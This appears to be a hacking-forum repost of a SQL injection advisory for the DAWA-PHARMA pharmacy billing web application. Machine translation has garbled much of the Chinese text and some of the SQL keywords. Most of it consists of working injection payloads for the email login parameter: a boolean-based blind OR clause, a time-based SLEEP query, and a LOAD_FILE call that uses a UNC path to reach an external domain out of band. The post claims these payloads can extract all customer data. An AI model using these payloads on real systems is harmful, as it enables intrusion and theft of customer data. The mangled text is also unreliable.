H

DAWA-PHARMA 1.0-2022-多sqli

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
## title: dawa-pharma-1.0-2022多sqli
##作者: nu11secur1ty
## Date: 10/12/2023
## Vendor: https://www.mayurik.com/
## Software: https://www.mayurik.com/source-code/p0349/best-pharmacy-billing-software-free-download
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
电子邮件参数似乎容易受到SQL注入攻击的影响。
有效载荷'+(选择
load_file('\\\\\ ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupapaputka.com \\ lhc')+')+'
在电子邮件参数中提交。此有效载荷注入SQL
使用UNC文件路径调用MySQL的LOAD_FILE函数的子查询
这引用了外部域上的URL。应用程序
与该域进行交互,表明注射的SQL查询
被执行。攻击者可以为客户获取所有信息
服务器的此应用程序以及非常敏感的信息
用于通过利用漏洞访问服务器。
[+]有效载荷:
``MySQL
---
参数:电子邮件(发布)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句
PAYLOAD:电子邮件=-8698'或5305=5305-- vvuhpassword=mayuriklogin=
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: email=[email protected]'+(select
load_file('\\\\\ ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupapaputka.com \\ lhc')+'''''''''
(从(select(Sleep(15)))Kuth选择4515-
vrdcpassword=mayuriklogin=
---
````````
##复制:
系统管理员- 基础设施工程师
穿透测试工程师
主页page: https://www.nu11secur1ty.com/
 
后退
顶部